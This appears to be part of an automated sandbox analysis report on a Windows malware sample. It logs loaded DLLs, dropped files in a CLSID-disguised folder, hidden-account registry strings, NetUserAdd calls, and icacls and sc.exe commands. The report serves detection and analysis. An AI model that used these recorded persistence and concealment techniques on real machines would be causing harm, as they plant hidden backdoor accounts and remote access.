Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: elstrans.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | File written: C:\Users\user\AppData\Local\Temp\wfpblk.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: cZO.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: cZO.exe | Static file information: File size 4528128 > 1048576
Source: cZO.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x355e00
Source: Binary string: RfxVmt.pdb source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr
Source: Binary string: RfxVmt.pdbGCTL source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr

Data Obfuscation

Source: C:\Users\user\Desktop\cZO.exeUnpacked PE file: 0.2.cZO.exe.2510000.1.unpack
Source: rfxvmt.dll.22.drStatic PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,6_2_00007FF77572FF1F
Source: cZO.exeStatic PE information: section name: .didata
Source: vc71izwl68ub3txurufnpr09g6ni3.exe.1.drStatic PE information: section name: .xdata
Source: shdpeqdz2a54sj46ur0.exe.1.drStatic PE information: section name: .xdata
Source: main.exe.11.drStatic PE information: section name: .xdata
Source: rdpctl.dll.22.drStatic PE information: section name: .xdata
Source: samctl.dll.22.drStatic PE information: section name: .xdata
Source: prgmgr.dll.22.drStatic PE information: section name: .xdata
Source: dwlmgr.dll.22.drStatic PE information: section name: .xdata
Source: cnccli.dll.22.drStatic PE information: section name: .xdata
Source: libi2p.dll.22.drStatic PE information: section name: .xdata
Source: evtsrv.dll.22.drStatic PE information: section name: .xdata
Source: termsrv32.dll.22.drStatic PE information: section name: .xdata
Source: EgwqOk24.22.drStatic PE information: section name: .xdata
Source: OwuZZod2.22.drStatic PE information: section name: .xdata
Source: GmdNT1AN.22.drStatic PE information: section name: .xdata
Source: o6oDuAJl.22.drStatic PE information: section name: .xdata
Source: I77yQ5in.22.drStatic PE information: section name: .xdata
Source: XpOp833v.22.drStatic PE information: section name: .xdata
Source: YkhL6reh.22.drStatic PE information: section name: .xdata
Source: YXkdIYk6.22.drStatic PE information: section name: .xdata
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024EF262 push es; retf 0_2_024EF263
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024D675D push esi; ret 0_2_024D675F
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024D3D4E push eax; iretd 0_2_024D3D4F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB5FC37 push rsp; ret 32_2_00007FF8BFB5FC38
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915521B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,22_2_00007FF8B915521B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\GEGgzh0sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\XpOp833vJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\I77yQ5inJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\user\Desktop\cZO.exeFile created: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\EgwqOk24Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\o6oDuAJlJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\OwuZZod2Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\user\Desktop\cZO.exeFile created: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YXkdIYk6Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\YkhL6reh
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\GmdNT1AN
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\GEGgzh0s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\XpOp833v
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\I77yQ5in
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\EgwqOk24
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\o6oDuAJl
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\OwuZZod2
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\YXkdIYk6
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe File created: C:\Users\user\AppData\Local\Temp\installer.log
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF6BE038C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF6BE038C4A
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000016.00000003.2455168978.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000003.2455168978.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000020.00000002.3263957296.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.3263957296.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: samctl.dll.22.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: samctl.dll.22.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: update.pkg.11.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: update.pkg.11.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\Desktop\cZO.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
